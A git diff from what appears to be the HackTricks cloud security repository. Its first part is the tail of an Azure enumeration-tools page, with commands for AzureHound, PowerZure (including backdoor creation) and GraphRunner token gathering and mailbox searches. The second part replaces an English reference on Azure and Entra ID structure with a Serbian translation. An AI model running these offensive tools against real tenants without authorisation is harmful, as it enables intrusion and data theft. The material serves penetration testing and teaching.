-
 ### [**Stormspotter**](https://github.com/Azure/Stormspotter)
-
 ```powershell
 # Start Backend
 cd stormspotter\backend\
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
 python stormspotter\stormcollector\sscollector.pyz cli
 # This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
 ```
-
 ### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
-
 ```powershell
 # You need to use the Az PowerShell and Azure AD modules:
 $passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
@@ -294,9 +275,7 @@ MATCH  p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
 ## All Azure AD Groups that are synchronized with On-Premise AD
 MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
 ```
-
 ### [Azucar](https://github.com/nccgroup/azucar)
-
 ```bash
 # You should use an account with at least read-permission on the assets you want to access
 git clone https://github.com/nccgroup/azucar.git
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
 # resolve the TenantID for an specific username
 PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
 ```
-
 ### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
-
 ```
 Import-Module .\MicroBurst.psm1
 Import-Module .\Get-AzureDomainInfo.ps1
 Get-AzureDomainInfo -folder MicroBurst -Verbose
 ```
-
 ### [**PowerZure**](https://github.com/hausec/PowerZure)
-
 ```powershell
 Connect-AzAccount
 ipmo C:\Path\To\Powerzure.psd1
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
 # Administrator
 $ Create-Backdoor, Execute-Backdoor
 ```
-
 ### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
-
 ```powershell
 
 #Get-GraphTokens
@@ -398,9 +371,4 @@ Get-TenantID -Domain
 #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
 Invoke-GraphRunner -Tokens $tokens
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md
index a600b66dc..c6f76cde3 100644
--- a/src/pentesting-cloud/azure-security/az-basic-information/README.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md
@@ -1,48 +1,48 @@
-# Az - Basic Information
+# Az - Osnovne informacije
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organization Hierarchy
+## Hijerarhija organizacije
 
 
https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

 
-### Management Groups
+### Grupa za upravljanje
 
-- It can contain **other management groups or subscriptions**.
-- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
-- **10,000 management** groups can be supported in a single directory.
-- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level.
-- Each management group and subscription can support **only one parent**.
-- Even if several management groups can be created **there is only 1 root management group**.
-  - The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
-- All subscriptions within a single management group must trust the **same Entra ID tenant.**
+- Može sadržati **druge grupe za upravljanje ili pretplate**.
+- Ovo omogućava **primenu kontrola upravljanja** kao što su RBAC i Azure Policy jednom na nivou grupe za upravljanje i da se one **naslede** od svih pretplata u grupi.
+- **10.000 grupa za upravljanje** može biti podržano u jednoj direktoriji.
+- Drvo grupa za upravljanje može podržati **do šest nivoa dubine**. Ova granica ne uključuje nivo korena ili nivo pretplate.
+- Svaka grupa za upravljanje i pretplata mogu podržavati **samo jednog roditelja**.
+- Čak i ako se može kreirati nekoliko grupa za upravljanje, **postoji samo 1 grupa za upravljanje korenom**.
+- Grupa za upravljanje korenom **sadrži** sve **druge grupe za upravljanje i pretplate** i **ne može se premestiti ili obrisati**.
+- Sve pretplate unutar jedne grupe za upravljanje moraju verovati **istom Entra ID tenant-u.**
 
 
https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

 
-### Azure Subscriptions
+### Azure pretplate
 
-- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
-- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
-- It **trust only one Entra ID** directory
-- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
+- To je još jedan **logički kontejner u kojem se mogu pokretati resursi** (VM-ovi, DB-ovi…) i za koji će se naplaćivati.
+- Njegov **roditelj** je uvek **grupa za upravljanje** (i može biti grupa za upravljanje korenom) jer pretplate ne mogu sadržati druge pretplate.
+- **Veruje samo jednoj Entra ID** direktoriji
+- **Dozvole** primenjene na nivou pretplate (ili bilo kojem od njenih roditelja) se **nasleđuju** na sve resurse unutar pretplate
 
-### Resource Groups
+### Grupe resursa
 
-[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
+[Iz dokumenata:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) Grupa resursa je **kontejner** koji sadrži **povezane resurse** za Azure rešenje. Grupa resursa može uključivati sve resurse za rešenje, ili samo one **resurse koje želite da upravljate kao grupom**. Generalno, dodajte **resurse** koji dele **isti životni ciklus** u istu grupu resursa kako biste ih lako implementirali, ažurirali i obrisali kao grupu.
 
-All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
+Svi **resursi** moraju biti **unutar grupe resursa** i mogu pripadati samo jednoj grupi, a ako se grupa resursa obriše, svi resursi unutar nje se takođe brišu.
 
 
https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1

 
-### Azure Resource IDs
+### Azure ID resursa
 
-Every resource in Azure has an Azure Resource ID that identifies it.
+Svaki resurs u Azure-u ima Azure ID resursa koji ga identifikuje.
 
-The format of an Azure Resource ID is as follows:
+Format Azure ID resursa je sledeći:
 
 - `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
 
-For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
+Za virtuelnu mašinu nazvanu myVM u grupi resursa `myResourceGroup` pod ID-jem pretplate `12345678-1234-1234-1234-123456789012`, Azure ID resursa izgleda ovako:
 
 - `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
 
@@ -50,327 +50,323 @@ For a virtual machine named myVM in a resource group `myResourceGroup` under sub
 
 ### Azure
 
-Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
+Azure je Microsoftova sveobuhvatna **platforma za cloud računarstvo, koja nudi širok spektar usluga**, uključujući virtuelne mašine, baze podataka, veštačku inteligenciju i skladištenje. Deluje kao osnova za hostovanje i upravljanje aplikacijama, izgradnju skalabilnih infrastruktura i pokretanje modernih radnih opterećenja u oblaku. Azure pruža alate za programere i IT profesionalce da kreiraju, implementiraju i upravljaju aplikacijama i uslugama bez problema, zadovoljavajući razne potrebe od startapa do velikih preduzeća.
 
-### Entra ID (formerly Azure Active Directory)
+### Entra ID (ranije Azure Active Directory)
 
-Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
+Entra ID je usluga za upravljanje **identitetom i pristupom zasnovana na oblaku** koja je dizajnirana da upravlja autentifikacijom, autorizacijom i kontrolom pristupa korisnika. Omogućava siguran pristup Microsoftovim uslugama kao što su Office 365, Azure i mnoge aplikacije trećih strana. Sa funkcijama kao što su jedinstveno prijavljivanje (SSO), višefaktorska autentifikacija (MFA) i politike uslovnog pristupa, između ostalog.
 
-### Entra Domain Services (formerly Azure AD DS)
+### Entra Domain Services (ranije Azure AD DS)
 
-Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
+Entra Domain Services proširuje mogućnosti Entra ID nudeći **upravljane usluge domena kompatibilne sa tradicionalnim Windows Active Directory okruženjima**. Podržava nasleđene protokole kao što su LDAP, Kerberos i NTLM, omogućavajući organizacijama da migriraju ili pokreću starije aplikacije u oblaku bez implementacije lokalnih kontrolera domena. Ova usluga takođe podržava grupne politike za centralizovano upravljanje, što je čini pogodnom za scenarije u kojima nasleđena ili AD-bazirana radna opterećenja treba da koegzistiraju sa modernim cloud okruženjima.
 
-## Entra ID Principals
+## Entra ID Principali
 
-### Users
+### Korisnici
 
-- **New users**
-  - Indicate email name and domain from selected tenant
-  - Indicate Display name
-  - Indicate password
-  - Indicate properties (first name, job title, contact info…)
-    - Default user type is “**member**”
-- **External users**
-  - Indicate email to invite and display name (can be a non Microsft email)
-  - Indicate properties
-    - Default user type is “**Guest**”
+- **Novi korisnici**
+- Naznačite ime i domen e-pošte iz odabranog tenant-a
+- Naznačite prikazano ime
+- Naznačite lozinku
+- Naznačite svojstva (ime, radno mesto, kontakt informacije…)
+- Podrazumevani tip korisnika je “**član**”
+- **Spoljni korisnici**
+- Naznačite e-poštu za poziv i prikazano ime (može biti e-pošta koja nije Microsoft)
+- Naznačite svojstva
+- Podrazumevani tip korisnika je “**Gost**”
 
-### Members & Guests Default Permissions
+### Podrazumevane dozvole članova i gostiju
 
-You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
+Možete ih proveriti na [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) ali među ostalim radnjama član će moći da:
 
-- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
-- Invite Guests (_can be turned off_)
-- Create Security groups
-- Read non-hidden Group memberships
-- Add guests to Owned groups
-- Create new application (_can be turned off_)
-- Add up to 50 devices to Azure (_can be turned off_)
+- Čita sve korisnike, grupe, aplikacije, uređaje, uloge, pretplate i njihove javne osobine
+- Poziva goste (_može se isključiti_)
+- Kreira sigurnosne grupe
+- Čita ne-skrivene članstva grupa
+- Dodaje goste u vlasničke grupe
+- Kreira nove aplikacije (_može se isključiti_)
+- Dodaje do 50 uređaja u Azure (_može se isključiti_)
 
 > [!NOTE]
-> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
+> Zapamtite da da biste enumerisali Azure resurse, korisnik treba da ima eksplicitno odobrenje za dozvolu.
 
-### Users Default Configurable Permissions
+### Podrazumevane konfigurabilne dozvole korisnika
 
-- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
-  - Register Applications: Default **Yes**
-  - Restrict non-admin users from creating tenants: Default **No**
-  - Create security groups: Default **Yes**
-  - Restrict access to Microsoft Entra administration portal: Default **No**
-    - This doesn’t restrict API access to the portal (only web)
-  - Allow users to connect work or school account with LinkedIn: Default **Yes**
-  - Show keep user signed in: Default **Yes**
-  - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
-  - Read other users: Default **Yes** (via Microsoft Graph)
-- **Guests**
-  - **Guest user access restrictions**
-    - **Guest users have the same access as members** grants all member user permissions to guest users by default.
-    - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
-    - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
-  - **Guests can invite**
-    - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
-    - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
-    - **Only users assigned to specific admin roles can invite guest users**
-    - **No one in the organization can invite guest users including admins (most restrictive)**
-  - **External user leave**: Default **True**
-    - Allow external users to leave the organization
+- **Članovi (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
+- Registracija aplikacija: Podrazumevano **Da**
+- Ograničavanje ne-administrativnih korisnika od kreiranja tenant-a: Podrazumevano **Ne**
+- Kreiranje sigurnosnih grupa: Podrazumevano **Da**
+- Ograničavanje pristupa Microsoft Entra administrativnom portalu: Podrazumevano **Ne**
+- Ovo ne ograničava API pristup portalu (samo web)
+- Dozvoliti korisnicima da povežu radni ili školski nalog sa LinkedIn-om: Podrazumevano **Da**
+- Prikazati zadržavanje korisnika prijavljenim: Podrazumevano **Da**
+- Ograničiti korisnike od oporavka BitLocker ključeva za njihove vlasničke uređaje: Podrazumevano Ne (proverite u podešavanjima uređaja)
+- Čitati druge korisnike: Podrazumevano **Da** (putem Microsoft Graph)
+- **Gosti**
+- **Ograničenja pristupa gostujućim korisnicima**
+- **Gosti imaju iste pristupe kao članovi** dodeljuju sve dozvole članova gostujućim korisnicima podrazumevano.
+- **Gosti imaju ograničen pristup svojstvima i članstvima objekata direktorijuma (podrazumevano)** ograničava pristup gostiju samo na njihov vlastiti korisnički profil podrazumevano. Pristup informacijama o drugim korisnicima i grupama više nije dozvoljen.
+- **Pristup gostujućim korisnicima je ograničen na svojstva i članstva njihovih vlastitih objekata direktorijuma** je najrestriktivniji.
+- **Gosti mogu pozivati**
+- **Svako u organizaciji može pozvati gostujuće korisnike uključujući goste i ne-administratore (najinkluzivnije) - Podrazumevano**
+- **Članovi korisnici i korisnici dodeljeni specifičnim administrativnim ulogama mogu pozvati gostujuće korisnike uključujući goste sa članovskim dozvolama**
+- **Samo korisnici dodeljeni specifičnim administrativnim ulogama mogu pozvati gostujuće korisnike**
+- **Niko u organizaciji ne može pozvati gostujuće korisnike uključujući administratore (najrestriktivnije)**
+- **Spoljni korisnici mogu napustiti**: Podrazumevano **Tačno**
+- Dozvoliti spoljnim korisnicima da napuste organizaciju
 
 > [!TIP]
-> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
+> Čak i ako su podrazumevano ograničeni, korisnici (članovi i gosti) sa dodeljenim dozvolama mogli bi izvršiti prethodne radnje.
 
-### **Groups**
+### **Grupe**
 
-There are **2 types of groups**:
+Postoje **2 tipa grupa**:
 
-- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
-- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
-  - This will have an **email address** with the domain of the EntraID tenant.
+- **Sigurnosne**: Ova vrsta grupe se koristi za davanje članovima pristupa aplikacijama, resursima i dodeljivanje licenci. Korisnici, uređaji, servisni principi i druge grupe mogu biti članovi.
+- **Microsoft 365**: Ova vrsta grupe se koristi za saradnju, dajući članovima pristup zajedničkoj pošti, kalendaru, datotekama, SharePoint lokaciji itd. Članovi grupe mogu biti samo korisnici.
+- Ovo će imati **adresu e-pošte** sa domenom EntraID tenant-a.
 
-There are **2 types of memberships**:
+Postoje **2 tipa članstva**:
 
-- **Assigned**: Allow to manually add specific members to a group.
-- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
+- **Dodeljeno**: Omogućava ručno dodavanje specifičnih članova u grupu.
+- **Dinamičko članstvo**: Automatski upravlja članstvom koristeći pravila, ažurirajući uključivanje grupe kada se atributi članova promene.
 
-### **Service Principals**
+### **Servisni principi**
 
-A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
+**Servisni princip** je **identitet** kreiran za **upotrebu** sa **aplikacijama**, hostovanim uslugama i automatizovanim alatima za pristup Azure resursima. Ovaj pristup je **ograničen ulogama dodeljenim** servisnom principu, dajući vam kontrolu nad **koji resursi mogu biti pristupljeni** i na kojem nivou. Iz bezbednosnih razloga, uvek se preporučuje da **koristite servisne principe sa automatizovanim alatima** umesto da im dozvolite prijavu sa korisničkim identitetom.
 
-It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
+Moguće je **direktno se prijaviti kao servisni princip** generišući mu **tajnu** (lozinku), **sertifikat** ili dodeljujući **federisani** pristup platformama trećih strana (npr. Github Actions) preko njega.
 
-- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
-- If you choose certificate authentication, make sure the **application will have access over the private key**.
+- Ako izaberete **lozinku** za autentifikaciju (podrazumevano), **sačuvajte generisanu lozinku** jer je nećete moći ponovo pristupiti.
+- Ako izaberete autentifikaciju sertifikatom, uverite se da će **aplikacija imati pristup privatnom ključu**.
 
-### App Registrations
+### Registracije aplikacija
 
-An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
+**Registracija aplikacije** je konfiguracija koja omogućava aplikaciji da se integriše sa Entra ID i da izvršava radnje.
 
-#### Key Components:
+#### Ključne komponente:
 
-1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
-2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
-3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions). 
-   1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
-4. **API Permissions:** Specifies what resources or APIs the app can access.
-5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
-6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
-   1. The **service principal** will get all the requested permissions it was configured with.
+1. **ID aplikacije (Client ID):** Jedinstveni identifikator za vašu aplikaciju u Azure AD.
+2. **Redirect URIs:** URL-ovi na koje Azure AD šalje odgovore na autentifikaciju.
+3. **Sertifikati, tajne i federisani kredencijali:** Moguće je generisati tajnu ili sertifikat za prijavu kao servisni princip aplikacije, ili dodeliti federisani pristup (npr. Github Actions). 
+1. Ako je **sertifikat** ili **tajna** generisana, moguće je da osoba **prijavi kao servisni princip** koristeći CLI alate znajući **ID aplikacije**, **tajnu** ili **sertifikat** i **tenant** (domen ili ID).
+4. **API dozvole:** Određuje koje resurse ili API-je aplikacija može pristupiti.
+5. **Podešavanja autentifikacije:** Definiše podržane tokove autentifikacije aplikacije (npr., OAuth2, OpenID Connect).
+6. **Servisni princip**: Servisni princip se kreira kada se aplikacija kreira (ako se to uradi iz web konzole) ili kada se instalira u novom tenant-u.
+1. **Servisni princip** će dobiti sve tražene dozvole sa kojima je konfigurisan.
 
-### Default Consent Permissions
+### Podrazumevane dozvole pristanka
 
-**User consent for applications**
+**Korisnički pristanak za aplikacije**
 
-- **Do not allow user consent**
-  - An administrator will be required for all apps.
-- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
-  - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
-  - **Default** low impact permissions (although you need to accept to add them as low):
-    - User.Read - sign in and read user profile
-    - offline_access - maintain access to data that users have given it access to
-    - openid - sign users in
-    - profile - view user's basic profile
-    - email - view user's email address
-- **Allow user consent for apps (Default)**
-  - All users can consent for any app to access the organization's data.
+- **Ne dozvoliti korisnički pristanak**
+- Administrator će biti potreban za sve aplikacije.
+- **Dozvoliti korisnički pristanak za aplikacije od verifikovanih izdavača, za odabrane dozvole (Preporučeno)**
+- Svi korisnici mogu dati pristanak za dozvole klasifikovane kao "niskog uticaja", za aplikacije od verifikovanih izdavača ili aplikacije registrovane u ovoj organizaciji.
+- **Podrazumevane** dozvole niskog uticaja (iako morate prihvatiti da ih dodate kao niske):
+- User.Read - prijavite se i pročitajte korisnički profil
+- offline_access - održava pristup podacima kojima su korisnici dali pristup
+- openid - prijavite korisnike
+- profile - pogledajte osnovni profil korisnika
+- email - pogledajte adresu e-pošte korisnika
+- **Dozvoliti korisnički pristanak za aplikacije (Podrazumevano)**
+- Svi korisnici mogu dati pristanak za bilo koju aplikaciju da pristupi podacima organizacije.
 
-**Admin consent requests**: Default **No**
+**Zahtevi za pristanak administratora**: Podrazumevano **Ne**
 
-- Users can request admin consent to apps they are unable to consent to
-- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
-  - Configure also if users will receive email notifications and expiration reminders 
+- Korisnici mogu zatražiti pristanak administratora za aplikacije za koje ne mogu dati pristanak
+- Ako je **Da**: Moguće je naznačiti korisnike, grupe i uloge koje mogu dati zahteve za pristanak
+- Takođe konfigurišite da li će korisnici primati obaveštenja putem e-pošte i podsetnike o isteku 
 
-### **Managed Identity (Metadata)**
+### **Upravljani identitet (metapodaci)**
 
-Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
+Upravljani identiteti u Azure Active Directory nude rešenje za **automatsko upravljanje identitetom** aplikacija. Ovi identiteti se koriste od strane aplikacija u svrhu **povezivanja** sa **resursima** kompatibilnim sa autentifikacijom Azure Active Directory (**Azure AD**). Ovo omogućava **uklanjanje potrebe za hardkodiranjem cloud kredencijala** u kodu jer će aplikacija moći da kontaktira **metapodatkovnu** uslugu kako bi dobila važeći token za **izvršavanje radnji** kao naznačeni upravljani identitet u Azure-u.
 
-There are two types of managed identities:
+Postoje dva tipa upravljanih identiteta:
 
-- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
-- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
+- **Sistemom dodeljeni**. Neke Azure usluge omogućavaju vam da **omogućite upravljani identitet direktno na instanci usluge**. Kada omogućite sistemom dodeljeni upravljeni identitet, **servisni princip** se kreira u Entra ID tenant-u kojem veruje pretplata u kojoj se resurs nalazi. Kada se **resurs** **obriše**, Azure automatski **briše** **identitet** za vas.
+- **Korisnikom dodeljeni**. Takođe je moguće da korisnici generišu upravljane identitete. Ovi se kreiraju unutar grupe resursa unutar pretplate i servisni princip će biti kreiran u EntraID kojem veruje pretplata. Zatim, možete dodeliti upravljeni identitet jednoj ili **više instanci** Azure usluge (više resursa). Za korisnikom dodeljene upravljane identitete, **identitet se upravlja odvojeno od resursa koji ga koriste**.
 
-Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
+Upravljani identiteti **ne generišu večne kredencijale** (kao što su lozinke ili sertifikati) za pristup kao servisni princip koji je povezan sa njima.
 
-### Enterprise Applications
+### Preduzeća aplikacije
 
-It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to.
+To je samo **tabela u Azure-u za filtriranje servisnih principa** i proveru aplikacija koje su dodeljene.
 
-**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities.
+**To nije još jedan tip "aplikacije",** ne postoji nijedan objekat u Azure-u koji je "Preduzeće aplikacija", to je samo apstrakcija za proveru servisnih principa, registracija aplikacija i upravljanih identiteta.
 
-### Administrative Units
+### Administrativne jedinice
 
-Administrative units allows to **give permissions from a role over a specific portion of an organization**.
+Administrativne jedinice omogućavaju **davanje dozvola iz uloge nad specifičnim delom organizacije**.
 
-Example:
+Primer:
 
-- Scenario: A company wants regional IT admins to manage only the users in their own region.
-- Implementation:
-  - Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
-    - Populate AUs with users from their respective regions.
-      - AUs can **contain users, groups, or devices**
-      - AUs support **dynamic memberships**
-      - AUs **cannot contain AUs**
-    - Assign Admin Roles:
-      - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
-- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
+- Scenario: Kompanija želi da regionalni IT administratori upravljaju samo korisnicima u svojoj regiji.
+- Implementacija:
+- Kreirajte administrativne jedinice za svaku regiju (npr., "Severna Amerika AU", "Evropa AU").
+- Popunite AU sa korisnicima iz njihovih odgovarajućih regija.
+- AU može **sadržati korisnike, grupe ili uređaje**
+- AU podržavaju **dinamička članstva**
+- AU **ne mogu sadržati AU**
+- Dodelite administrativne uloge:
+- Dodelite ulogu "Administrator korisnika" regionalnom IT osoblju, ograničeno na AU njihove regije.
+- Ishod: Regionalni IT administratori mogu upravljati korisničkim nalozima unutar svoje regije bez uticaja na druge regije.
 
-### Entra ID Roles
+### Entra ID uloge
 
-- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
-  - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
-- The most privileged role is **Global Administrator**
-- In the Description of the role it’s possible to see its **granular permissions**
+- Da bi upravljali Entra ID, postoje neke **ugrađene uloge** koje se mogu dodeliti Entra ID principima za upravljanje Entra ID
+- Proverite uloge na [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
+- Najprivilegovanija uloga je **Globalni administrator**
+- U opisu uloge moguće je videti njene **granularne dozvole**
 
-## Roles & Permissions
+## Uloge i dozvole
 
-**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
+**Uloge** se **dodeljuju** **principima** na **opsegu**: `principal -[HAS ROLE]->(scope)`
 
-**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
+**Uloge** dodeljene **grupama** se **nasleđuju** od svih **članova** grupe.
 
-Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
+U zavisnosti od opsega na koji je uloga dodeljena, **uloga** se može **naslediti** na **druge resurse** unutar kontejnera opsega. Na primer, ako korisnik A ima **ulogu na pretplati**, imaće tu **ulogu na svim grupama resursa** unutar pretplate i na **svim resursima** unutar grupe resursa.
 
-### **Classic Roles**
+### **Klasične uloge**
 
-| **Owner**                     | 
  • Full access to all resources
  • Can manage access for other users
 | All resource types |
-| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
-| **Contributor**               | 
  • Full access to all resources
  • Cannot manage access
              | All resource types |
-| **Reader**                    | • View all resources                                                                     | All resource types |
-| **User Access Administrator** | 
  • View all resources
  • Can manage access for other users
           | All resource types |
+| **Vlasnik**                     | 
  • Puni pristup svim resursima
  • Može upravljati pristupom za druge korisnike
 | Svi tipovi resursa |
+| ------------------------------- | ------------------------------------------------------------------------------------------ | ------------------ |
+| **Doprinosilac**               | 
  • Puni pristup svim resursima
  • Ne može upravljati pristupom
          | Svi tipovi resursa |
+| **Čitač**                      | • Pregled svih resursa                                                                   | Svi tipovi resursa |
+| **Administrator pristupa korisnika** | 
  • Pregled svih resursa
  • Može upravljati pristupom za druge korisnike
 | Svi tipovi resursa |
 
-### Built-In roles
+### Ugrađene uloge
 
-[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
+[Iz dokumenata: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure kontrola pristupa zasnovana na ulogama (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) ima nekoliko **ugrađenih uloga** koje možete **dodeliti** **korisnicima, grupama, servisnim principima i upravljanim identitetima**. Dodeljivanje uloga je način na koji kontrolišete **pristup Azure resursima**. Ako ugrađene uloge ne zadovoljavaju specifične potrebe vaše organizacije, možete kreirati svoje [**Azure prilagođene uloge**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
 
-**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
+**Ugrađene** uloge se primenjuju samo na **resurse** za koje su **namenjene**, na primer, proverite ova 2 primera **ugrađenih uloga** nad Compute resursima:
 
